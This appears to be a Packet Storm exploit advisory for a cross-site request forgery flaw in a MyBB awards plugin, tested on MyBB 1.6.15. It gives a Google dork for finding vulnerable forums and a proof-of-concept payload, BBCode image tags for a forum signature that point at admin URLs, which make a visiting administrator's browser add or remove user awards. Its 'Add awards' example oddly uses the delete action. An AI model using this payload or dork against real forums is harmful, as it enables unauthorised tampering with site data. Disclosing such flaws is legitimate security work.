MyBB version 1.6.15 suffers from a cross site request forgery vulnerability.
1d3cbd754819ecc59f45d3c06619581f1198302e0b64245967e18910a34dda88# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15
PoC(set this as your signature or iframe it)
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
[/img]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed